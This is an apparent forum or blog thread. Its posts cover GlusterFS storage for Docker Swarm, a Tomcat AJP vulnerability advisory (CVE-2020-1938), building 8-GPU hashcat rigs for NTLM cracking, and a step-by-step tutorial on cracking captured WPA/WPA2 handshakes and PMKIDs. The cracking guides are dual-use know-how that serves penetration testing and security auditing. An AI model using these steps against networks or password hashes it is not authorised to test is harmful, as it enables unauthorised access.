    And from this arises the problem we began to face. We were starting to develop applications that required files to be shared amongst each other. We also have numerous applications that require files to be saved and distributed without them being dumped into the database as blobs. And these files were required to be available without cycling volumes and/or dumping them into the containers during build time. Because of this, we needed some form of persistent and distributed file storage across our containers.

    (Below is an image showing how a docker swarms volumes are oriented)

    -image-

    How we got around this!

    Now, in this day and age there have got to be ways to get around this. There are at least 101 ways to do just about anything, and it doesn’t always have to be the newest, shiniest toy everyone’s using. I know saying this while using Docker is kind of a hypocritical statement, but shared file systems have been around for decades. You’ve been able to mount network drives, FTP drives, and organizational shared folders; the list can go on for days.

    But the big question is, how do we get a container to mount a local shared folder or distribute volumes across all swarm nodes? Well, there’s a whole list of distributed filesystems and modern storage mechanisms in the docker documentation. The alternatives I found most recommended for distributed file systems or NFS-style storage in the docker ecosystem are discussed below.

    I know you’re wondering why we didn’t use S3, DigitalOcean Spaces, GCS, or some other cloud storage. But internally we have a finite amount of resources, and we can spin up VMs and be rolling in a matter of moments, especially considering we have built a number of Ansible playbooks to quickly provision our servers. Plus, why throw resources out on the cloud when it’s not needed? Especially when we can metaphorically create our own network-based file system and have our own cloud-based storage system.

    (Below is an image showing we want to distribute file system changes)

    -image-

    After looking at several methods I settled on GlusterFS, a scalable network filesystem. Don’t get me wrong, a number of the other alternatives are pretty groundbreaking and some amazing work has been put into developing them. But I don’t have thousands of dollars to drop on setting up a network file system that may or may not work for our needs. There were also several others that I did look pretty heavily into, such as StorageOS and Ceph. With StorageOS I really liked the idea of a container-based file system that stores, synchronizes, and distributes files to all other storage nodes within the swarm. And it may just be me, but Ceph looked like the prime competitor to Gluster. They both have their high points and seem to work very reliably. But at the time it wasn’t for me, and after using Gluster for a few months, I believe that I made the right choice and it has served its purpose well.

    [attachment:5e6268fd50592]

    Gluster Notes

    (Note: The following steps are to be used on a Debian/Ubuntu based install.)

    Documentation for using Gluster can be found in their docs. Their installation instructions are very brief and explain how to install the gluster packages, but they don’t go into depth on how to set up a Gluster network. I also suggest thoroughly reading through the documentation to understand Gluster volumes, bricks, pools, etc.

    Installing GlusterFS

    To begin, you will need to list all of the Docker Swarm nodes you wish to connect in the /etc/hosts file of each server. On Linux (Debian/Ubuntu), you can get the current node’s IP address by running the following command: hostname -I | awk '{print $1}'

    (The majority of the commands listed below need to be run on each and every node simultaneously unless specified otherwise. To do this I opened a number of terminal tabs and connected to each server in a different tab.)

    # /etc/hosts
    10.10.10.1 staging1.example.com staging1
    10.10.10.2 staging2.example.com staging2
    10.10.10.3 staging3.example.com staging3
    10.10.10.4 staging4.example.com staging4
    10.10.10.5 staging5.example.com staging5
    # Update & Upgrade all installed packages
    apt-get update && apt-get upgrade -y
    
    # Install gluster dependencies
    sudo apt-get install python-software-properties -y

    Add the GlusterFS PPA to the list of trusted package sources so the packages can be installed from the community repository.

    sudo add-apt-repository ppa:gluster/glusterfs-3.10;
    sudo apt-get update

    Now let’s install gluster:

    sudo apt-get install -y glusterfs-server attr

    Before starting the Gluster service, I had to copy some files into systemd (you may or may not have to do this). Since Gluster was developed by Red Hat primarily for RHEL and CentOS, I had a few issues starting the system service on Ubuntu.

    sudo cp /etc/init.d/glusterfs-server /etc/systemd/system/

    Let’s start and enable the glusterfs system service

    systemctl enable glusterfs-server; systemctl start glusterfs-server

    This step isn’t necessary, but I like to verify that the service is enabled and running:

    # Verify the gluster service is enabled
    systemctl is-enabled glusterfs-server
    # Check the system service status of the gluster-server
    systemctl status glusterfs-server

    If for some reason you haven’t done this yet, each and every node should have its own SSH key generated.

    (The only reason I can think of why they wouldn’t have different keys is if a VM was provisioned and then cloned for similar use across a swarm.)

    # This is to generate a very basic SSH key, you may want to specify a key type such as ED25519 or bit length if required.
    ssh-keygen -t rsa

    Depending on your Docker Swarm environment and which server you’re running as a manager, you’ll probably want one of the node managers to also be a gluster node manager. I’m going to say server staging1 is one of our node managers, so on this server we’re going to probe all other gluster nodes to add them to the gluster pool. (Probing them is essentially this manager telling all servers on this list to connect to each other.)

    gluster peer probe staging1; gluster peer probe staging2; gluster peer probe staging3; gluster peer probe staging4; gluster peer probe staging5;

    It’s not required, but probably good practice to ensure all of the nodes have connected to the pool before setting up the file system.

    gluster pool list
    
    # => You should get results similar to the following
    UUID					Hostname 	State
    a8136a2b-a2e3-437d-a003-b7516df9520e	staging3 	Connected
    2a2f93f6-782c-11e9-8f9e-2a86e4085a59	staging2 	Connected
    79cb7ec0-f337-4798-bde9-dbf148f0da3b	staging4 	Connected
    3cfc23e6-782c-11e9-8f9e-2a86e4085a59	staging5 	Connected
    571bed3f-e4df-4386-bd46-3df6e3e8479f	localhost	Connected
    
    # You can also run the following command to another set of results
    gluster peer status

    Now let’s create the gluster data storage directories. (It’s very important you do this on every node, because this directory is where all gluster nodes will store the distributed files locally.)

    sudo mkdir -p /gluster/brick

    Now let’s create a gluster volume across all nodes (again, run this on the master node/node manager).

    sudo gluster volume create staging-gfs replica 5 staging1:/gluster/brick staging2:/gluster/brick staging3:/gluster/brick staging4:/gluster/brick staging5:/gluster/brick force

    The next step is to initialize the glusterFS to begin synchronizing across all nodes.

    gluster volume start staging-gfs

    This step is also not required, but I prefer to verify the gluster volume replicated across all of the designated nodes.

    gluster volume info

    Now let’s ensure gluster mounts the /mnt directory as its shared directory, especially on a reboot. (It’s important to run these commands on all gluster nodes.)

    sudo umount /mnt
    echo 'localhost:/staging-gfs /mnt glusterfs defaults,_netdev,backupvolfile-server=localhost 0 0' | sudo tee -a /etc/fstab
    sudo mount.glusterfs localhost:/staging-gfs /mnt
    sudo chown -R root:docker /mnt

    (You may have noticed the setting of file permissions using chown -R root:docker; this is to ensure docker will have read/write access to the files in the specified directory.)

    If for some reason you’ve already deployed your staging gluster-fs and need to remount the staging-gfs volume you can run the following command. Otherwise you should be able to skip this step.

    sudo umount /mnt; sudo mount.glusterfs localhost:/staging-gfs /mnt; sudo chown -R root:docker /mnt

    Let’s list all of our mounted partitions and ensure that the staging-gfs is listed.

    df -h
    
    # => staging-gfs should be listed in the partitions/disks listed
    localhost:/staging-gfs              63G   13G   48G  21% /mnt

    Now that all of the work is pretty much done, comes the fun part: let’s test to make sure it all works. Let’s cd into the /mnt directory and create a few files to make sure they sync across all nodes. (I know this is one of the first things I wanted to try out.) You can run one of the following commands to generate a random file in the /mnt directory. Depending on your servers and network connections, this should sync up across all nodes almost instantly. The way I tested this: I was in the /mnt directory on several nodes in several terminals, and as soon as I issued the command on one node I ran the ls command in the other tabs. Depending on the file size, it may not sync across all nodes instantly, but it is at least accessible.

    # This creates a 24MB file full of zeros
    dd if=/dev/zero of=output.dat bs=24M  count=1
    
    # Creates a 2MB file of random characters
    dd if=/dev/urandom of=output.log bs=1M count=2

    Using GlusterFS with Docker

    Now that all the fun stuff is done, if you haven’t looked at docker volumes or bind mounts yet, this would probably be a good time. Usually docker will store a volume’s contents in a folder structure similar to the following: /var/lib/docker/volumes/DogTracker/_data.

    But in your docker-compose.yml or docker-stack.yml you can specify specific mount points for the docker volumes. If you look at the following YAML snippet, you will notice I’m telling it to store the container’s /opt/couchdb/data directory on the local mount point /mnt/staging_couch_db.

    version: '3.7'
    services:
      couchdb:
        image: couchdb:2.3.0
        volumes:
          - type: bind
            source: /mnt/staging_couch_db
            target: /opt/couchdb/data
        networks:
          - internal
        deploy:
          resources:
            limits:
              cpus: '0.30'
              memory: 512M
            reservations:
              cpus: '0.15'
              memory: 256M
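
    With the bind mount pointing at the GlusterFS-backed /mnt, deploying a stack like this to the swarm is the usual one-liner (the stack name here is just an example):

    docker stack deploy -c docker-stack.yml staging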

    Now, as we previously demonstrated, any file(s) saved, created, and/or deleted in the /mnt directory will be synchronized across all of the GlusterFS nodes.

    I’d just like to mention this may not work for everyone, but this is the method that worked best for us. We’ve been running a number of different Gluster networks for several months now with no issues thus far.

  5. Tue Mar 3 10:38:52 2020

    Recently, a new vulnerability on Apache Tomcat AJP connector was disclosed.

    The flaw was discovered by a security researcher at Chaitin Tech [1] and allows a remote attacker to read any webapp files or include a file.

    The AJP Connector

    The AJP Connector [3] is generally used to manage (internal) requests, usually on port 8009, coming for example from an Apache HTTP Server.
    The vulnerability (CVE-2020-1938) could be remotely exploited if port 8009 is publicly exposed.

    According to a tweet by Joao Matos [2], the vulnerability is not a default RCE (Remote Command Execution), but an LFI (Local File Inclusion) that can be turned into RCE:

    CVE-2020-1938 is NOT a default Remote Code Execution vul. It is a LFI. So, IF you can:

    1. upload files via an APP feature &
    2. these files are saved inside the document root (eg. webapps/APP/… &
    3. reach the AJP port directly;

    Thus, it can be turned in RCE.

    A Proof-of-Concept for the vulnerability has been released on GitHub, without any additional details.
    Furthermore, the researchers also published an “online detection tool” useful to remotely check for the vulnerability.

    [attachment:5e5dd0b43629b]

    Which Tomcat versions are affected?

    • Tomcat 6 (no longer maintained)
    • Tomcat 7.x < 7.0.100
    • Tomcat 8.x < 8.5.51
    • Tomcat 9.x < 9.0.31

    Is there a fix?

    Apache Tomcat has officially released versions 9.0.31, 8.5.51, and 7.0.100 to fix this vulnerability.
    To fix this vulnerability correctly, you first need to determine if the Tomcat AJP Connector service is used in your server environment:
    • If no cluster or reverse proxy is used, you can basically determine that AJP is not used.
    • Otherwise, you need to figure out if the cluster or reverse server is communicating with the Tomcat AJP Connector service.

    For additional details about fixing, please refer to the advisory.
    As usual, update ASAP (and check port 8009 exposure)!
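
    A quick way to check your own servers is to look for an enabled AJP connector in server.xml and for a listener on port 8009 (a hedged sketch, assuming CATALINA_HOME points at your Tomcat installation):

    # Is an AJP connector defined in the Tomcat config? (check whether the matching line is commented out)
    grep -n 'protocol="AJP/1.3"' "$CATALINA_HOME/conf/server.xml"

    # Is anything listening on the default AJP port?
    ss -lnt | grep ':8009'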

    References

  6. 6 weeks ago
    Tue Feb 11 20:56:03 2020
    Men in Black started the conversation How to build a (2nd) 8 GPU password cracker.

    [attachment:5e42b0e46185a]

    Background

    In February 2017, we took our first shot at upgrading our old open-frame 6 GPU cracker (NVIDIA 970). It served us well, but we needed to crack 8 and 9-character NTLM hashes within hours and not days. The 970s were not cutting it and cooling was always a challenge. Our original 8 GPU rig was designed to put our cooling issues to rest.

    Speaking of cooling issues, we enjoyed reading all of the comments on our 2017 build. Everyone seemed convinced that we were about to melt down our data center. We thank everyone for their concern (and entertainment).

    • "the graphics cards are too close!"
    • "nonsense. GTX? LOL. No riser card? LOL good luck."

    To address cooling, we specifically selected (at the time) NVIDIA 1080 Founders Edition cards due to their 'in the front and out the rear' centrifugal fan design. A couple months after our initial blog, we upgraded from NVIDIA 1080 to NVIDIA 1080 Ti cards. And admittedly, we later found that the extra memory was useful when cracking with large (>10GB) wordlists.

    OK, But Why?

    Shortly after building our original 8 GPU cracker, we took it to RSA and used it as part of a narrated live hacking demo. Our booth was a play on the Warlock’s command center where we hacked Evil Corp from the comfort of Ma’s Basement. (yeah, a bit unique for RSA…)

    [attachment:5e42b14ad8bd1]

    Shopping List

    You have a little flexibility here, but we’d strongly suggest the Tyan chassis and Founders Edition NVIDIA cards. The Tyan comes with the motherboard, power supplies (3x), and arrives all cabled up and ready to build. We went with a 4TB SSD to hold some very large wordlists but did not set up RAID with a 2nd drive (yet). Higher CPU speeds and memory mostly help with dictionary attacks; a different build may therefore be better suited for non-GPU cracking.
    Hardware

    • Tyan B7079F77CV10HR-N
    • 2x Intel Xeon E5-2630 V4 Broadwell-EP 2.2 GHz (LGA 2011-3 85W)

    +Be sure to get V3 or V4 (V4 recommended to support DDR4 2400 RAM)! *We learned the hard way!

    • 128GB (4 x 32GB) DDR4 2400 (PC4 19200) 288-Pin 1.2V ECC Registered DIMM
    • Samsung EVO 4TB 2.5” SSD

    Software

    • Ubuntu - 18.04 LTS server (x64)
    • hashcat - www.hashcat.net
    • hashview - www.hashview.io

    Cost

    • Depends heavily on the current market price of GPUs. ($12K-$17K)
    • At least the software is all free! And who can put a price on cracking performance?

    The Build

    Despite being a hash munching monster and weighing nearly 100 lbs. when assembled, this build is easy enough for a novice.

    [attachment:5e42b1b6577c8]

    Hardware Build Notes

    • Normally I like to install the CPU(s) first, but I ordered the wrong ones and had to install them 3 days later. Be sure to get V3 or V4 XEON E5 processors; V2 is cheaper but ‘it don’t fit’.

    +When installing the (included) Tyan heat-sinks, we added a little extra thermal paste even though the heat-sinks already have some on the bottom.

    • Install memory starting in Banks A and E (see diagram above). CPU 0 and CPU 1 each require matching memory. Memory Banks A-D are for CPU 0 and Memory Banks E-H are for CPU 1. We added 2x 32GB in Bank A and 2x 32GB in Bank E for a total of 128GB RAM.
    • Install hard drive for (Linux) operating system. We chose a 4TB SSD drive to ensure plenty of storage for large wordlists and optimum read/write performance. The chassis has 10 slots so feel free to go crazy with RAID and storage if you wish.
    • Prep all 8 GPU cards by installing the included Tyan GPU mounting brackets. They are probably not required, but they ensure a good seat.
    • Install GPU cards. Each NVIDIA 1080 Ti requires 2 power connections per card. The regular 1080 cards only require 1 if you decide not to go the ‘Ti’ route. Again, Tyan includes all necessary power cables with the chassis.
    • Connect or insert OS installation media. I hate dealing with issues related to booting and burning ISOs written to USB flash; so we went with a DVD install (USB attached drive).
    • Connect all 3 power cords to the chassis and connect the other end of each cord to a dedicated 15A or 20A circuit. While cracking, the first 2 power supplies draw 700-900W with less on the 3rd. They do like dedicated circuits though; it is easy to trip breakers if anything else is sharing the circuit (see the rough power math below).
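
    As a rough sanity check on those numbers (assuming the commonly quoted ~250 W board power per 1080 Ti, plus the 85 W TDP Xeons from the parts list): 8 x 250 W + 2 x 85 W ≈ 2,170 W at full load before drives and fans, which is why the chassis ships with three supplies and why dedicated circuits matter.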

    Software Build Notes

    Everyone has their own preferred operating system and configuration, so we’ve decided not to go telling you how to do your thing. If you are new to installing and using a Linux operating system, we did include a complete walk-through in our February 2017 post: How to build a 8 GPU password cracker.

    The basic software build steps are as follows:

    • Install your preferred Linux OS. We chose Ubuntu 18.04 LTS (64 bit - server). Fully update and upgrade.
    • Prepare for updated NVIDIA drivers:

    +Blacklist the generic NVIDIA Nouveau driver

    sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo bash -c "echo options nouveau modeset=0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo update-initramfs -u
    sudo reboot

    +Add 32-bit headers

    sudo dpkg --add-architecture i386
    sudo apt-get update
    sudo apt-get install build-essential libc6:i386

    +Download, unzip and install the latest NVIDIA driver from http://www.nvidia.com/Download/index.aspx

    [attachment:5e42b2434baa9]

    sudo ./NVIDIA*.run
    sudo reboot
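
    If the driver installed cleanly, a quick sanity check after the reboot is to list the GPUs with the utility that ships with the NVIDIA driver; all 8 cards should show up:

    nvidia-smi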

    The Outcome

    Go ahead, run a benchmark with hashcat to make sure everything works!

    ./hashcat-5.0.0/hashcat64.bin -m 1000 -b

  7. Tue Feb 11 20:46:34 2020
    Men in Black started the conversation How to build a 8 GPU password cracker.

    TL;DR

    This build doesn't require any "black magic" or hours of frustration like desktop components do. If you follow this blog and its parts list, you'll have a working rig in 3 hours. These instructions should remove any anxiety of spending 5 figures and not knowing if you'll bang your head for days.

    The Goal

    Upgrade our current rig from 6 GTX 970s to 8 GTX 1080s. Don't blow a fuse.

    Parts list

    Hardware

    • Chassis & Motherboard - Tyan Ft77C-B7079 (P/N: B7079F77CV10HR-N)
    • CPU - 2x Xeon E5-2620 V3 LGA2011 (don't purchase just one CPU; 2 are required to control all PCIe slots)
    • Memory - 2x 32GB DDR4 2400 288-pin LRDIMM
    • Hard drive - 1TB Samsung SSD 850 EVO
    • GPUs - 8x EVGA GTX 1080 Founders Edition (whatever you get, make sure it's a Founders Edition, sometimes called a reference card/edition)

    Software

    • Ubuntu - 14.04.3 server (x64)
    • hashcat - www.hashcat.net
    • hashview - www.hashview.io

    Assembly

    Nowadays building mid-grade to high-end password crackers is like playing with legos, albeit expensive legos.

    We did a time lapse of the build:

    Build notes

    There are few things we learned during the purchasing and assembly.

    • You don't need to purchase a separate heatsink and fan for your CPUs. The Tyan chassis will come with them.
    • The Tyan chassis comes with brackets that screw into the back of your GPUs to secure them in place. These may not be needed if you never move the box, but it doesn't hurt to install them. We did.
    • Rails are included with the Tyan.
    • This chassis doesn't appear to have an onboard hardware RAID. I just assumed it would :-(
    • The BIOS didn't require any modifications or flashing. It came fully updated as of January 2017.
    • We disabled the system speaker because it will scream at you if you don't have all three power supplies plugged in.

    [attachment:5e42aeb654b0d]

    In the image below you can see the brackets that attach to the rear of the GPU for added support. Probably not needed but if you were to ship this rig I'd install them. This thing is HEAVY!

    [attachment:5e42aedc56abc]

    [attachment:5e42aedc5315d]

    [attachment:5e42aedc4fad6]

    [attachment:5e42aedc7c4f8]

    [attachment:5e42aedd0a957]

    [attachment:5e42aedd0e7c9]

    Software Install

    We had no hardware issues, but to be safe we installed one GPU, booted the system, and once we verified it could POST with no issues, we started installing the OS. Once Ubuntu finished installing, we installed the remaining GPUs. Since things went so smoothly, next time I'd just fully install all GPUs and fire it up. Nothing to worry about.

    Install Ubuntu 14.04.3 Server (x64)

    Not going to cover this in detail. But here are a few things we considered.

    1. Use LVM
    2. We chose not to encrypt the whole disk or home directory. We generally make an encrypted volume later.
    3. Choose 'OpenSSH Server' from the software selection screen (one less step post install)

    Once the OS is installed, verify the GPUs are detected by the OS:

    lspci | grep VGA

    Update and install dependencies for drivers and hashcat

    sudo apt-get update && sudo apt-get upgrade
    sudo apt-get install gcc make p7zip-full git lsb-core

    Download and install Nvidia drivers and Intel OpenCL runtime

    Download Nvidia drivers. Nvidia 375.26 was current at the time of this build (January 2017).

    UPDATE 4/10/2017 - If using 1080 Ti, use driver 378.13

    wget http://us.download.nvidia.com/XFree86/Linux-x86_64/375.26/NVIDIA-Linux-x86_64-375.26.run
    chmod +x NVIDIA-Linux-x86_64-375.26.run
    sudo ./NVIDIA-Linux-x86_64-375.26.run

    If you get warning messages about x86 you can ignore them. Here's an example of one:

    WARNING: Unable to find a suitable destination to install 32-bit compatibility libraries. Your system may not be set up for 32-bit compatibility. 32-bit compatibility files will not be installed; if you wish
    to install them, re-run the installation and set a valid directory with the --compat32-libdir option

    Install OpenCL runtime (not required but why not, use those CPUs too)

    wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
    tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
    cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25
    ./install.sh 

    Install hashcat - www.hashcat.net

    wget https://hashcat.net/files/hashcat-3.30.7z
    7z x hashcat-3.30.7z
    cd hashcat-3.30

    Test hashcat by running a benchmark...at 341 GH/s!!!!

    meatball@kraken3:~/hashcat-3.30$ ./hashcat64.bin -m 1000 -b
    hashcat (v3.30) starting in benchmark mode...
    
    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #5: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #6: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #7: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #8: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    Hashtype: NTLM
    Speed.Dev.#1.....: 42896.1 MH/s (62.48ms)
    Speed.Dev.#2.....: 42604.1 MH/s (62.97ms)
    Speed.Dev.#3.....: 42799.0 MH/s (62.57ms)
    Speed.Dev.#4.....: 42098.9 MH/s (63.68ms)
    Speed.Dev.#5.....: 42871.5 MH/s (62.57ms)
    Speed.Dev.#6.....: 42825.0 MH/s (62.64ms)
    Speed.Dev.#7.....: 42848.9 MH/s (62.54ms)
    Speed.Dev.#8.....: 42449.8 MH/s (63.16ms)
    Speed.Dev.#*.....:   341.4 GH/s
    Started: Mon Feb 13 17:54:12 2017
    Stopped: Mon Feb 13 17:54:31 2017

    Install hashview - www.hashview.io

    Install dependencies

    sudo apt-get update
    sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl
    mysql_secure_installation

    Optimize the database

    vim /etc/mysql/my.cnf

    Add the following line under the [mysqld] section:

    innodb_flush_log_at_trx_commit  = 0

    Restart mysql

    service mysql restart

    Install RVM - (commands below are from https://rvm.io/rvm/install)

    gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
    \curl -sSL https://get.rvm.io | bash -s stable --ruby

    Download and setup Hashview

    git clone https://github.com/hashview/hashview
    cd hashview

    Install gems (from Hashview directory)

    rvm install ruby-2.2.2
    gem install bundler
    bundle install

    Setup database connectivity

    cp config/database.yml.example config/database.yml
    vim config/database.yml
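
    The example file shows the exact keys Hashview expects; as a rough sketch, a filled-in version typically ends up looking something like this (the values below are placeholders for illustration, and the keys in the shipped database.yml.example take precedence):

    production:
      adapter: mysql2                 # placeholder values; mirror database.yml.example
      host: localhost
      username: root
      password: <your mysql password>
      database: hashview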

    Create database

    RACK_ENV=production rake db:setup

    In another terminal or screen session, kick off resque

    RACK_ENV=production TERM_CHILD=1 QUEUE=* rake resque:work

    note: In production mode no output will be displayed until a job has started

    Run Hashview

    RACK_ENV=production ruby hashview.rb

    Crack Hashes

    Start a job and start cracking!

    [attachment:5e42b01e7223d]

    Then intensely watch analytics in realtime while sipping on your favorite cocktail
    [attachment:5e42b029043ed]

    Stay tuned...

    We just bought our second 8 GPU rig! In a future post we'll show you how to easily support distributed cracking using Hashview.

  8. 7 weeks ago
    Sun Feb 9 21:34:18 2020

    [attachment:5e4015df6b568]

    WPA/WPA2 cracking has been a focus point in the community for many years, and we have tools like aircrack-ng and hashcat to support it. Some new advancements have been made in the past couple of years.

    So, cracking WPA/WPA2 remains quite a topic. In this tutorial, we are going to cover one of the best-known tools, "hashcat", for cracking WPA/WPA2.

    Hashcat, which is primarily built for brute forcing different kinds of hashes using different kinds of attack vectors, supports cracking for two well-known WPA/WPA2 attacks. For the list of available hashes, you can check the hash modes section in the manual:

    [attachment:5e40164e00267]

    Previously, you might have seen or even worked with aircrack-ng to crack WPA/WPA2 by capturing a 4-way handshake, but it is nowhere near as well suited to this purpose. Hashcat can use both the GPU and the CPU, which makes it a lot faster.

    In short, if you own a GPU, always go for hashcat; otherwise you could use an online service or rent a GPU-based server on the Internet.

    We will cover two well-known WPA/WPA2 attacks, namely cracking the MIC (4-way handshake) and the PMKID (1st packet/handshake). So, let's begin.

    Installation

    Hashcat is built to work on Windows, Linux, as well as on Mac. You can go to hashcat.net, download the binaries and follow the instructions for your operating system. What we are going to do here is clone a fresh copy of hashcat from GitHub and manually install it on a Debian-based Linux.

    Preferably, you should use Kali or Parrot, but a similar distro like Ubuntu will work as well.

    Update your repos and install the following dependencies:

    $ apt update
    $ apt install git build-essential ocl-icd-libopencl1 libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev -y

    Clone hashcat from github and move to directory:

    $ git clone https://github.com/hashcat/hashcat.git
    $ cd hashcat/

    Finally, compile the binaries and we are all set with hashcat.

    $ git submodule update --init
    $ sudo make && sudo make install

    [attachment:5e4016876cead]

    You may try printing the help manual for hashcat to check whether it installed correctly.

    $ hashcat --help

    [attachment:5e40169fdfb52]

    Hcxtools:

    Now, let's clone and compile hcxtools from GitHub. It is basically a set of utilities for converting and reformatting captured traffic. We will use it to convert the captured traffic into a format understandable by hashcat.

    First, clone the repo and move into the hcxtools directory:

    $ git clone https://github.com/ZerBea/hcxtools.git
    $ cd hcxtools/

    And finally, run the make command to compile the binaries and install them into your path.

    $ sudo make && sudo make install

    [attachment:5e4016c531cf7]

    After having the requirements installed, we move to the cracking part. Below, the tutorial is divided into two parts: first we will crack WPA/WPA2 using the MIC, aka the 4-way handshake, and in the second part we will crack using the PMKID.

    PART A

    Let's clarify how MIC cracking actually works. In this case, we need a valid 4-way handshake. The handshake consists of several keys that are exchanged during the authentication between the client and the access point.

    These independent keys are used to generate a common value named the "Message Integrity Code (MIC)". This MIC is what the cracker uses to validate each password guess.

    STEP 1

    Conversion to hccapx format

    Supposing you have already captured a 4-way handshake using some tool like airodump-ng, you still need the proper format to supply it to hashcat. To convert it to the proper format (hccapx), you need another tool.

    There are already some online services that you may use: https://hashcat.net/cap2hccapx/

    But in case you would rather do it locally, clone the hashcat-utils repo from GitHub:

    $ git clone https://github.com/hashcat/hashcat-utils.git
    $ cd hashcat-utils/src

    Finally, compile the binaries. After compiling, you will have the binaries under the same directory. The binary file that we need is cap2hccapx.bin. To make sure you have it correctly compiled, try to execute the file; it will print back the syntax:

    $ sudo make
    $ ./cap2hccapx.bin

    [attachment:5e401718c32c8]

    So, after having it compiled, use the syntax below to convert the .cap file to the .hccapx hashcat capture format.

    $ ./cap2hccapx.bin /path/to/capfile.cap hashfile.hccapx

    [attachment:5e401732044ce]

    This will generate a file by the name "hashfile.hccapx", which is what we are going to use with hashcat. Now, you may move to whatever directory you want, since we will be cracking this file from now on.

    STEP 2

    Cracking WPA/WPA2 (handshake) with hashcat

    With hashcat, various attack vectors are possible. We could do a straight dictionary attack, a brute-force attack, a combinator attack or even a mask attack, i.e. making rules to try different characters at different positions.

    Anyhow, let's study the actual cracking of WPA/WPA2 handshake with hashcat.

    Dictionary Attack:

    As the name implies, you need a wordlist for it to work. Hopefully you have a solid list of possible wifi passphrases; if not, you can download well-known ones: https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html

    Launch the following command for dictionary attack:

    $ hashcat -a 0 -m 2500 hashfile.hccapx /path/to/dict.txt

    [attachment:5e40175a6faf0]

    • -a: specifies the cracking mode. In our case 0 is dictionary (straight) mode, and "/path/to/dict.txt" is the complete path to the wordlist.

    • -m: hash mode. Specifies what type of hash we are dealing with; 2500 is WPA/WPA2.

    In case you receive issues regarding the Intel CPU or "No devices found/left", use the --force argument to force the usage of your device.

    Brute-Force Attack:

    The brute-force attack is different from the dictionary attack. Here, we try every character from a given charset at every possible position in a string of a specified length. For example, in a string of length 8, we can try every character from A-Z at every position.

    That's how brute-forcing works, and hence it is very time-consuming. Launch the following command to start your first attempt at brute-forcing:

    $ hashcat -m 2500 -a 3 hashfile.hccapx ?d?d?d?d?d?d?d?d

    [attachment:5e40177e5163a]

    • -a: specifies the cracking mode; here the value 3 indicates we are running a brute-force (mask) attack.
    • ?d?d?d?d?d?d?d?d: is the mask. It specifies which characters to try at each position, which also determines how long the attack will take.

    The above mask, i.e. "?d?d?d?d?d?d?d?d", checks every string of length 8 with a digit at every position. You can study the mask attack here: Hashcat Mask Attack.
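
    Masks can also mix character classes via custom charsets. As a quick illustration (not from the original post), the following defines custom charset 1 as "lowercase letters or digits" with -1 and applies it to all 8 positions:

    $ hashcat -a 3 -m 2500 -1 ?l?d hashfile.hccapx ?1?1?1?1?1?1?1?1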

    PART B

    Part A was about handshake cracking. Now we are going to crack the PMKID with hashcat. The PMKID is found in the 1st packet of the 4-way handshake, which makes it more convenient because we don't need a complete handshake.

    The algorithm to compute the PMKID is given below and is simpler than that of the MIC.

    PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
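
    To make the formula concrete, here is a minimal sketch of the computation using openssl (the PMK and the two MAC addresses are made-up placeholder values; in a real attack they come from the capture and the passphrase under test):

    $ PMK=000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
    $ ( printf 'PMK Name'; printf '\xaa\xbb\xcc\xdd\xee\xff'; printf '\x11\x22\x33\x44\x55\x66' ) \
        | openssl dgst -sha1 -mac HMAC -macopt hexkey:$PMK | cut -d' ' -f2 | cut -c1-32

    The first MAC is the access point's, the second is the station's, and the first 128 bits (32 hex characters) of the HMAC-SHA1 output are the PMKID.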

    Let the cracking begin for PMKID.

    STEP 1

    Getting the PMKID hash

    The first thing we need for PMKID cracking is the PMKID hash itself. To generate it we need the first packet of the 4-way handshake. Considering you already have that, we will extract the hash from the capture file.

    Let's do the conversion. Execute the command below:

    $ hcxpcaptool -z pmkid.hash /path/to/capture.cap

    [attachment:5e4017ec9df19]

    This will generate a file by the name pmkid.hash that we will use with hashcat to do the cracking.

    STEP 2

    Cracking WPA/WPA2 (PMKID) with hashcat

    Just like the previous part, we will apply the same rules here except for the hash mode argument. The hash mode value for PMKID cracking is 16800.

    Dictionary Attack:

    We will use the very same syntax we used back in the PART A section for the dictionary attack, except for the -m argument, which defines what kind of hash we want to crack. We will be cracking the PMKID (16800) this time.

    $ hashcat -a 0 -m 16800 pmkid.hash /path/to/wordlist.txt

    [attachment:5e401825d6a92]

    This will attempt to crack the key by looping through each line given in the wordlist.

    Brute-Force Attack:

    We will do the same here as in the last section, i.e. provide a mask to crack the hash. This time, just to show how flexible these masks can be, I'll use a different one. So, execute the command for the brute-force attack:

    $ hashcat -a 3 -m 16800 pmkid.hash ?l?l?l?l?l?l?l?l

    [attachment:5e40184664b72]

    The above mask will create combinations of strings of length 8 with every lowercase letter at every possible position. This is a huge keyspace that may take a lot of time to complete. To make the attack faster, we can use the GPU.

    CPU/GPU

    Now, getting into the CPU/GPU thing, we just need to know that a GPU is a lot faster than a CPU, and hashcat has the ability to do its cracking on your GPU. Hashcat supports the following three device types, which can be selected via the -D (--opencl-device-types) argument:

    • 1: CPU
    • 2: GPU
    • 3: DSP, Co-processor

    You can use one of these devices according to what's more suitable for you. For example,

    $ hashcat -a 0 -m 16800 -D 2 pmkid.hash /path/to/wordlist.txt

    This runs the PMKID dictionary attack on the GPU. And that's it: cracking WPA/WPA2 via hashcat.

    Conclusion

